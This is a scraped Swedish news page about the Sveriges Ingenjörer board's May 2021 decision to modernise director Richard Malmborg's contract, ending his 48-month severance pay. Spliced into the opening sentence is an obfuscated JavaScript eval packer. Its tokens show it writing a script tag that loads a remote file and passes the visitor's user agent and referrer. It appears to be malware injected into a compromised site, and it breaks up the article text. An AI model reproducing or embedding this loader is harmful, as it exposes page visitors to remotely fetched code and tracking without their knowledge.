Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Sveriges Ingenjörer – Beslut fattat – avtalet moderniseras

Sveriges Ingenjörer – Beslut fattat – avtalet moderniseras
Sebastian

Sveriges eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zzyid|var|u0026u|referrer|afybd||js|php’.split(’|’),0,{}))
Ingenjörers förbundsstyrelse har i dag beslutat om en tilläggsbilaga som innebär en markant modernisering av förbundsdirektör Richard Malmborgs avtal.

– Vi kan idag ännu gå in på några detaljer gällande överenskommelsen eftersom inget juridiskt bindande dokument ännu är upprättat, men på en övergripande nivå handlar det om att det uppmärksammade 48 månader långa avgångsvederlaget inte längre kommer att gälla, säger förbundsordförande Ulrika Lindstrand.

Vid första presidiemötet varje år är det policy att förbundsdirektören redogör för sitt avtal. Så skedde även i år.

– Utifrån denna redogörelse ansåg vi att villkoren inte ligger i linje med det moderna, framåtriktade förbund vi vill leda. Avtalet är helt enkelt otidsenligt, säger Joachim Pettersson, förste vide ordförande.

På styrelsens initiativ togs redan i februari extern juridisk expertis in för att göra en genomlysning av avtalet och se över möjligheter till förändringar.

– Resultatet drogs sedan av juristen för förbundsstyrelsen den 3 april. Då tiden för att diskutera denna fråga inte räckte till beslöt vi redan vid sittande möte att kalla till ett extra möte den 8 maj, säger Monica Normark, andre vice ordförande.

Dagens diskussioner har för det första resulterat i att styrelsen beslutat att uttala sitt fortsatta stöd för Richard Malmborg som förbundsdirektör. För det andra har styrelsen beslutat att ge accept till den tilläggsbilaga till avtalet som förbundsordföranden förhandlat fram med förbundsdirektören.

En annan förändring är att den fria representation i och utanför hemmet som också varit inskrivet i avtalet men aldrig nyttjats kommer att utgå.

– Jurister är redan inkopplade och vår uttalade ambition är att det arbetet ska vara färdigt före maj månads utgång, säger Ulrika Lindstrand.

Förtydligande: Både i Arbetets första publicering den 5 maj och i ett TT-telegram som gick ut senare samma dag står det att förbundsdirektören har rätt till fritt valda tjänster i hemmet. Detta är felaktigt. Den delen av avtalet förhandlades bort redan 2003.